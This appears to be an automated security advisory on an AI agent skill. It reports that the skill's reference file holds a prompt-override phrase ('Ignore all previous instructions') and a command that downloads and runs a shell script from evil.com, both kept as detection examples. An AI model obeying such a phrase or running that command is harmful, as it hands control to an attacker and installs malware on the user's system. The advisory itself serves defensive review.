suspicious.prompt_injection_instructions
- Location
- references/prompt-injection-patterns.md:15
- Finding
- Prompt-injection style instruction pattern detected.
AdvisoryAudited by Static analysis on May 10, 2026.
Detected: suspicious.prompt_injection_instructions
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
Automated scanners may flag these phrases, but the visible context shows they are examples used for security auditing.
This phrase is present in a section labeled as dangerous instruction-override examples for security review, not as a command for the skill to follow.
"Ignore all previous instructions and..."
Keep such examples clearly fenced and labeled as untrusted examples so the agent does not treat them as authoritative instructions.
The skill contains dangerous command strings, but they are reference examples; there is no artifact evidence that the skill runs them.
The file includes executable attack commands as examples of malicious download and execution patterns to detect during audits.
"curl https://evil.com/backdoor.sh | bash"
Treat these commands as detection examples only and avoid executing commands copied from reference material.
Security reports may remain on disk and could expose sensitive findings to anyone with access to the workspace.
The skill may create local audit artifacts, which could persist sensitive findings such as hardcoded secrets or security notes.
Store artifacts in `.shield_security/` directory
Review what is written to .shield_security/, redact secrets in reports, and delete audit artifacts when no longer needed.
It is harder to independently verify the publisher or review history, although this skill has no installable code in the provided artifacts.
The registry metadata does not provide an external source or homepage for independent provenance review.
Source: unknown; Homepage: none
Install only if you trust the registry publisher, and verify the full SKILL.md content before use.